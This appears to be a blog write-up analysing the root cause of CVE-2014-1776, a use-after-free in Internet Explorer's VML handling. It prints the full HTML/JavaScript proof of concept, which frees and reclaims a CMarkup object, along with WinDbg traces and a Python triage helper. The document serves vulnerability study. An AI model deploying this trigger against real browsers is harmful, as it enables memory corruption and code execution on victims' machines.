CVE-2014-1776 秘狐

The legendary IE 秘狐 vulnerability

[CNNVD] Microsoft Internet Explorer use-after-free vulnerability (CNNVD-201404-530)

Microsoft Internet Explorer (IE) is a web browser developed by Microsoft Corporation of the United States; it is the default browser shipped with the Windows operating system.

A use-after-free vulnerability exists in the VGX.DLL file of Microsoft IE versions 6 through 11. A remote attacker can exploit it to execute arbitrary code or cause a denial of service (memory corruption).

    POC:

    <html xmlns:v="urn:schemas-microsoft-com:vml">
    <STYLE>
    v:* { Behavior: url(#default#VML) }
    </STYLE>
    <head id="l">
    <title></title>
    <script>
        function trigger()
        {
            var r,t,e,i;
            var o = document.getElementById("l");
            r = document.createElement("i");
            t = r;
            r = document.getElementById("k").childNodes[0].appendChild(r) ;
            r = t.appendChild(o) ;
            e = r.offsetParent;
            e.onpropertychange=fun;
            i=o.firstChild.nextSibling;
            try
            {
                i.disabled = o;
            }
            catch (e) {}
        }
        function fun() 
        {
            var g_arr = [];
            var arrLen = 0x250;
            var m_block;
     
            for (var i = 0; i < arrLen; ++i) 
            {
                g_arr[i] = document.createElement('div');
            }
            var a = unescape("%uAAAA%uAAAA") ;  
            while (a.length < 0xd8) 
            {
                a += unescape("%uBBBB%uBBBB") ;
            }
            m_block = a.substring(0, (0xd8 - 2) / 2);
            try 
            {
                this.removeNode(true);
            } 
            catch (e) {}
            CollectGarbage();
            for (var i = 0; i < (arrLen / 2); ++i) 
            {
                g_arr[i].title = m_block ;
            }
        }
    </script>
    </head>
    <body>
    <v:group id="k" style="500pt;">
        <div></div> 
    </group>
    <script>
    trigger() ;
    </script>
    </body>
    </html>

Analysis shows that the UAF occurs on a CMarkup object.

This sample does reliably trigger the vulnerability, but it is clearly an engineered exploit, and the exploit's own behaviour interferes with our analysis of the root cause.

Reuse

    1:021> kv
    ChildEBP RetAddr  Args to Child              
    041ee998 68318a98 087abfc0 6837ce50 00000000 mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6 (FPO: [0,0,2])
    041ee9b8 68319d57 06dfbf30 00000003 041ee9dc mshtml!CMarkup::OnCssChange+0x52
    041ee9c8 6860a5b3 00000003 087abfc0 6837ce64 mshtml!CElement::OnCssChange+0x1e
    041ee9dc 6836bfc6 8001004c 00030080 6837ce50 mshtml!CStyleElement::OnPropertyChange+0xfc
    041eeabc 682e4bd1 6837ce64 ffffffff 087abfcc mshtml!NUMPROPPARAMS::SetNumberProperty+0x2d9
    041eead8 682e4ba1 0000ffff 0a82efd8 041eeb10 mshtml!CBase::put_BoolHelper+0x25
    041eeae8 682e24dd 087abfc0 0000ffff 068e8fd0 mshtml!CBase::put_Bool+0x22
    041eeb10 683f235c 087abfc0 068e8fd0 0a82efd8 mshtml!GS_VARIANTBOOL+0x19b
    041eeb84 683fc75a 087abfc0 8001004c 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
    041eebd4 6820c29b 087abfc0 8001004c 00000001 mshtml!CElement::ContextInvokeEx+0x9d
    041eec00 683a3104 087abfc0 8001004c 00000001 mshtml!CStyleElement::VersionedInvokeEx+0x62
    041eec54 645aa22a 06e9afd8 8001004c 00000001 mshtml!PlainInvokeEx+0xeb
    041eec90 645aa175 0819cd10 8001004c 00000409 jscript!IDispatchExInvokeEx2+0x104
    041eeccc 645aa3f6 0819cd10 00000409 0000000c jscript!IDispatchExInvokeEx+0x6a
    041eed8c 645aa4a0 8001004c 0000000c 00000000 jscript!InvokeDispatchEx+0x98
    041eedc0 645bd8c8 0819cd10 041eedf4 0000000c jscript!VAR::InvokeByName+0x139
    041eee08 645a9c0e 0819cd10 0000000c 00000000 jscript!VAR::InvokeDispName+0x7d
    041eef9c 645b5c9d 041eefb4 00000000 01876f88 jscript!CScriptRuntime::Run+0x208d
    041ef084 645b5bfb 00000000 00000000 01878fa0 jscript!ScrFncObj::CallWithFrameOnStack+0xce
    041ef0cc 645b74ac 00000000 00000000 01878fa0 jscript!ScrFncObj::Call+0x8d

Free

    1:021> g
    Breakpoint 0 hit
    eax=683720a8 ebx=06d96fe8 ecx=06fd1f30 edx=001f1078 esi=06fd1f30 edi=00000000
    eip=683e12b8 esp=0419b40c ebp=0419b414 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    mshtml!CMarkup::~CMarkup:
    683e12b8 8bff            mov     edi,edi
    1:021> ? esi
    Evaluate expression: 117251888 = 06fd1f30
    1:021> kv
    ChildEBP RetAddr  Args to Child              
    0419b408 683e1297 06fd1f30 0419b42c 68387dd0 mshtml!CMarkup::~CMarkup (FPO: [0,0,2])
    0419b414 68387dd0 00000001 68387db6 00000000 mshtml!CMarkup::`scalar deleting destructor'+0xd
    0419b41c 68387db6 00000000 06fd1f30 0419b450 mshtml!CBase::SubRelease+0x22 (FPO: [0,0,0])
    0419b42c 68319de5 06fd1f30 0540b680 6831a2d4 mshtml!CBase::PrivateRelease+0x3c
    0419b438 6831a2d4 0a978fd8 0a97efd8 00001400 mshtml!CMarkup::ProcessPeerTask+0x47 (FPO: [0,1,0])
    0419b450 683fc6ce 08a4af30 00000000 0a978fd8 mshtml!CMarkup::ProcessPeerTasks+0xf0
    0419b468 683f1e59 0a97efd8 07873260 10000003 mshtml!CElement::VersionedGetDispID+0x52
    0419b4ac 68a3a304 0a978fd8 07873260 10000003 mshtml!PlainGetDispID+0xdc
    0419b4dc 68a3a272 07873260 0419b518 0a978fd8 jscript!IDispatchExGetDispID+0xa5
    0419b4f4 68a3a47a 06e25d10 0419b518 00000003 jscript!GetDex2DispID+0x31
    0419b520 68a4d8c8 06e25d10 0419b554 0000000c jscript!VAR::InvokeByName+0xee
    0419b56c 68a39c0e 06e25d10 0000000c 00000000 jscript!VAR::InvokeDispName+0x7d
    0419b700 68a45c9d 0419b718 0419b85c 06e5bf88 jscript!CScriptRuntime::Run+0x208d
    0419b7e8 68a45bfb 0419b85c 00000000 06e57e80 jscript!ScrFncObj::CallWithFrameOnStack+0xce
    0419b830 68a45e11 0419b85c 00000000 06e57e80 jscript!ScrFncObj::Call+0x8d
    0419b8ac 68a3f3ee 06e5bf88 0419baf0 00000000 jscript!CSession::Execute+0x15f
    0419b994 68a3ea2e 00000000 00000001 0419ba4c jscript!NameTbl::InvokeDef+0x1b5
    0419ba18 68417af1 06e5bf88 00000000 00000804 jscript!NameTbl::InvokeEx+0x12c
    0419ba68 68417b91 063d2fc8 06e5bf88 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e1
    0419bb94 6838a932 80010013 8001179f 0a96cfd8 mshtml!CBase::InvokeEvent+0x214

Allocation

        70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
        77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
        77247d96 ntdll!RtlpAllocateHeap+0x000000c4
        772134ca ntdll!RtlAllocateHeap+0x0000023a
        6830a8da mshtml!CDoc::CreateMarkupFromInfo+0x000000e2
        6831625f mshtml!CDoc::CreateMarkup+0x0000004a
        6826d0b1 mshtml!CCommentElement::`scalar deleting destructor'+0x000002d3
        681ec57d mshtml!CElement::removeNode+0x00000046
        681ec630 mshtml!Method_IDispatchpp_oDoVARIANTBOOL+0x000000cc
        683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
        683fc75a mshtml!CElement::ContextInvokeEx+0x0000009d
        683fc79a mshtml!CInput::VersionedInvokeEx+0x0000002d
        683a3104 mshtml!PlainInvokeEx+0x000000eb
        67eba22a jscript!IDispatchExInvokeEx2+0x00000104
        67eba175 jscript!IDispatchExInvokeEx+0x0000006a
        67eba3f6 jscript!InvokeDispatchEx+0x00000098
        67eba4a0 jscript!VAR::InvokeByName+0x00000139
        67ecd8c8 jscript!VAR::InvokeDispName+0x0000007d
        67ecd96f jscript!VAR::InvokeByDispID+0x000000ce
        67ece3e7 jscript!CScriptRuntime::Run+0x00002b80
        67ec5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
        67ec5bfb jscript!ScrFncObj::Call+0x0000008d
        67ec5e11 jscript!CSession::Execute+0x0000015f
        67ebf3ee jscript!NameTbl::InvokeDef+0x000001b5
        67ebea2e jscript!NameTbl::InvokeEx+0x0000012c
        68417af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
        68417b91 mshtml!CBase::InvokeEvent+0x00000214
        6838a932 mshtml!CBase::FireEvent+0x000000e1
        683d4836 mshtml!CElement::FireEvent+0x000003c4
        6840c550 mshtml!CElement::Fire_onpropertychange+0x0000005a
        6840c4d7 mshtml!CElement::Fire_PropertyChangeHelper+0x00000121
        6840c457 mshtml!CElement::OnPropertyChange+0x00000b7b

Let's walk through the flow.

Modify the PoC by inserting helper statements (Math.tan/Math.sin/Math.cos calls, which serve as breakpoint markers in jscript so that native stops can be mapped back to the JS line they fall between):

    <html xmlns:v="urn:schemas-microsoft-com:vml">
    <STYLE>
    v:* { Behavior: url(#default#VML) }
    </STYLE>
    <head id="l">
    <title></title>
    <script>
    Math.tan(2,3);
        function trigger()
        {
            var r,t,e,i;
            var o = document.getElementById("l");
    Math.sin(2,3);
            r = document.createElement("i");
    Math.cos(2,3);
        t = r;
    Math.tan(2,3);
            r = document.getElementById("k").childNodes[0].appendChild(r) ;
    Math.sin(2,3);
            r = t.appendChild(o) ;
    Math.cos(2,3);
            e = r.offsetParent;
    Math.tan(2,3);
            e.onpropertychange=fun;
    Math.sin(2,3);
            i=o.firstChild.nextSibling;
    Math.cos(2,3);
            try
            {
            Math.tan(2,3);
                i.disabled = o;
            }
            catch (e) {}
        }
        function fun() 
        {
            var g_arr = [];
            var arrLen = 0x250;
            var m_block;
     
            for (var i = 0; i < arrLen; ++i) 
            {
                g_arr[i] = document.createElement('div');
            }
            var a = unescape("%uAAAA%uAAAA") ;  
            while (a.length < 0xd8) 
            {
                a += unescape("%uBBBB%uBBBB") ;
            }
            m_block = a.substring(0, (0xd8 - 2) / 2);
            try 
            {
    Math.cos(2,3);
                this.removeNode(true);
            } 
            catch (e) {}
    Math.tan(2,3);
            CollectGarbage();
            for (var i = 0; i < (arrLen / 2); ++i) 
            {
                g_arr[i].title = m_block ;
            }
        }
    </script>
    </head>
    <body>
    <v:group id="k" style="500pt;">
        <div></div> 
    </group>
    <script>
    trigger() ;
    </script>
    </body>
    </html>

    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040ded00 ecx=00000005 edx=00000003 esi=040decf0 edi=040decf0
    eip=688bd8c0 esp=040debf4 ebp=040dec30 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    Breakpoint 2 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!sin:
    688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
    1:021> g
    Breakpoint 1 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!cos:
    688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    Breakpoint 2 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!sin:
    688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
    1:021> g
    Breakpoint 1 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!cos:
    688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    Breakpoint 1 hit
    eax=00000000 ebx=040ddae0 ecx=00000005 edx=00000003 esi=040ddad0 edi=040ddad0
    eip=688bd67f esp=040dd9b4 ebp=040dd9f0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!cos:
    688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
    1:021> g
    Breakpoint 3 hit
    eax=040dd934 ebx=00000001 ecx=00000000 edx=6837c8f9 esi=05741680 edi=00000000
    eip=68316215 esp=040dd854 ebp=040dd938 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    mshtml!CDoc::CreateMarkup:
    68316215 8bff            mov     edi,edi
    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040ddae0 ecx=00000005 edx=00000003 esi=040ddad0 edi=040ddad0
    eip=688bd8c0 esp=040dd9b4 ebp=040dd9f0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    Breakpoint 2 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!sin:
    688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
    1:021> g
    Breakpoint 1 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!cos:
    688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
    eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    Breakpoint 1 hit
    eax=00000000 ebx=040db3a0 ecx=00000005 edx=00000003 esi=040db390 edi=040db390
    eip=688bd67f esp=040db274 ebp=040db2b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!cos:
    688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
    1:021> g
    Breakpoint 3 hit
    eax=040db1f4 ebx=00000001 ecx=07b9ff30 edx=6837c8f9 esi=05741680 edi=00000000
    eip=68316215 esp=040db114 ebp=040db1f8 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
    mshtml!CDoc::CreateMarkup:
    68316215 8bff            mov     edi,edi
    1:021> g
    Breakpoint 0 hit
    eax=00000000 ebx=040db3a0 ecx=00000005 edx=00000003 esi=040db390 edi=040db390
    eip=688bd8c0 esp=040db274 ebp=040db2b0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
    1:021> g
    (e68.584): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=07caff30 ebx=07caff30 ecx=a06dfdb5 edx=68335438 esi=07caff30 edi=0824efc0
    eip=68318d1d esp=040de6ec ebp=040de710 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6:
    68318d1d 8b465c          mov     eax,dword ptr [esi+5Ch] ds:0023:07caff8c=????????

Analysis shows that executing the statement

     this.removeNode(true);

causes CDoc::CreateMarkup to be called to create a markup.

CDoc::CreateMarkup is in fact a thin wrapper around CDoc::CreateMarkupFromInfo, and CDoc::CreateMarkupFromInfo allocates the memory through HeapAlloc.

By recording the allocation address this way, we find that the UAF object is actually the one allocated by the first CreateMarkup call.

    1:020> g
    Breakpoint 0 hit
    eax=00000000 ebx=042bde78 ecx=00000005 edx=00000003 esi=042bde68 edi=042bde68
    eip=67edd8c0 esp=042bdd74 ebp=042bddb0 iopl=0         nv up ei pl nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
    jscript!tan:
    67edd8c0 ff258010eb67    jmp     dword ptr [jscript!_imp__tan (67eb1080)] ds:0023:67eb1080={msvcrt!tan (758dde34)}
    1:020> bl
     0 e 67edd8c0     0001 (0001)  1:**** jscript!tan
     1 e 67edd67f     0001 (0001)  1:**** jscript!cos
     2 e 67edd711     0001 (0001)  1:**** jscript!sin
    1:020> bu mshtml!CMarkup::~CMarkup
    1:020> g
    Breakpoint 2 hit
    eax=00000000 ebx=042bed30 ecx=00000005 edx=00000003 esi=042bed20 edi=042bed20
    eip=67edd711 esp=042bec34 ebp=042bec70 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
    jscript!sin:
    67edd711 ff256810eb67    jmp     dword ptr [jscript!_imp__sin (67eb1068)] ds:0023:67eb1068={msvcrt!sin (758d8aea)}
    1:020> g
    Breakpoint 1 hit
    eax=00000000 ebx=042bed30 ecx=00000005 edx=00000003 esi=042bed20 edi=042bed20
    eip=67edd67f esp=042bec34 ebp=042bec70 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
    jscript!cos:
    67edd67f ff259010eb67    jmp     dword ptr [jscript!_imp__cos (67eb1090)] ds:0023:67eb1090={msvcrt!cos (758d8ace)}
    1:020> g
    Breakpoint 0 hit
    eax=00000000 ebx=042bb738 ecx=00000005 edx=00000003 esi=042bb728 edi=042bb728
    eip=67edd8c0 esp=042bb634 ebp=042bb670 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
    jscript!tan:
    67edd8c0 ff258010eb67    jmp     dword ptr [jscript!_imp__tan (67eb1080)] ds:0023:67eb1080={msvcrt!tan (758dde34)}
    1:020> g
    Breakpoint 3 hit
    eax=683720a8 ebx=0653efe8 ecx=07117f30 edx=00051078 esi=07117f30 edi=00000000
    eip=683e12b8 esp=042bb7a4 ebp=042bb7ac iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    mshtml!CMarkup::~CMarkup:
    683e12b8 8bff            mov     edi,edi
    1:020> ? ecx
    Evaluate expression: 118587184 = 07117f30
    1:020> g
    (b74.e8): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=07117f30 ebx=07117f30 ecx=9f3dcc40 edx=68335438 esi=07117f30 edi=08392fc0
    eip=68318d1d esp=042bea84 ebp=042beaa8 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6:
    68318d1d 8b465c          mov     eax,dword ptr [esi+5Ch] ds:0023:07117f8c=????????

There is no obvious JS statement that corresponds directly to the free or to the reuse.

The object is most likely freed because its reference count drops to zero.

Tracing upward from the crash site, the dangling pointer is found at CStyleElement+0x24.

Based on the OnCssChange function, my guess is that a change in the CSS structure causes the dangling pointer in CStyleElement, which points to the already-freed CMarkup object, to be dereferenced.
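As an added triage helper that is not part of the original post: the script below parses a constructed, abbreviated excerpt of the WinDbg transcript quoted above, notes which Math.* marker stop preceded each native stop, takes the object pointer at the CMarkup destructor (ecx, the __thiscall this, as in the "? ecx" step above) and checks that the faulting read at IsConnectedToPrimaryMarkup+0x6 is that same pointer plus 0x5C. That equality is what distinguishes a genuine use-after-free from an unrelated wild pointer; the "::~" destructor match and the marker names are assumptions of this helper.

```python
import re

# Constructed, abbreviated excerpt of the WinDbg session quoted above (values
# copied from it): Math.tan marker stop, CMarkup destructor stop, access violation.
TRACE = """\
Breakpoint 0 hit
eax=00000000 ebx=042bb738 ecx=00000005 edx=00000003 esi=042bb728 edi=042bb728
jscript!tan:
Breakpoint 3 hit
eax=683720a8 ebx=0653efe8 ecx=07117f30 edx=00051078 esi=07117f30 edi=00000000
mshtml!CMarkup::~CMarkup:
(b74.e8): Access violation - code c0000005 (first chance)
eax=07117f30 ebx=07117f30 ecx=9f3dcc40 edx=68335438 esi=07117f30 edi=08392fc0
mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6:
68318d1d 8b465c          mov     eax,dword ptr [esi+5Ch] ds:0023:07117f8c=????????
"""

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|eip|esp|ebp)=([0-9a-f]{8})")
# "[esi+5Ch] ds:0023:07117f8c=????????" -> base register, field offset, address
FAULT_RE = re.compile(r"\[(e[a-z]{2})\+([0-9A-Fa-f]+)h\] ds:[0-9a-f]{4}:([0-9a-f]{8})=\?")
MARKERS = ("jscript!tan", "jscript!sin", "jscript!cos")


def parse_events(trace):
    """Split a transcript (which must begin with a stop line) into stop events:
    registers, symbol stopped at, last Math.* marker seen, fault operand."""
    events, cur, marker = [], None, None
    for line in map(str.strip, trace.splitlines()):
        if line.startswith("Breakpoint") or "Access violation" in line:
            cur = {"regs": {}, "symbol": None, "after_marker": marker, "fault": None}
            events.append(cur)
        elif REG_RE.match(line):
            cur["regs"].update({r: int(v, 16) for r, v in REG_RE.findall(line)})
        elif line.endswith(":") and "!" in line:
            cur["symbol"] = line[:-1]
            marker = cur["symbol"] if cur["symbol"] in MARKERS else marker
        else:
            m = FAULT_RE.search(line)
            if m:
                cur["fault"] = (m.group(1), int(m.group(2), 16), int(m.group(3), 16))
    return events


def correlate(trace, this_reg="ecx"):
    """Pair the last destructor stop (this in ecx under __thiscall) with the fault."""
    events = parse_events(trace)
    freed = [e for e in events if e["symbol"] and "::~" in e["symbol"]]
    faults = [e for e in events if e["fault"]]
    if not freed or not faults:
        return None
    obj = freed[-1]["regs"][this_reg]
    base_reg, off, addr = faults[-1]["fault"]
    return {
        "freed_object": obj,
        "freed_after_marker": freed[-1]["after_marker"],
        "fault_addr": addr,
        "field_offset": off,
        # same pointer value, read at a field offset inside the freed object: UAF
        "dangling": faults[-1]["regs"][base_reg] == obj and addr == obj + off,
    }
```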

Original article: https://www.cnblogs.com/Ox9A82/p/5833842.html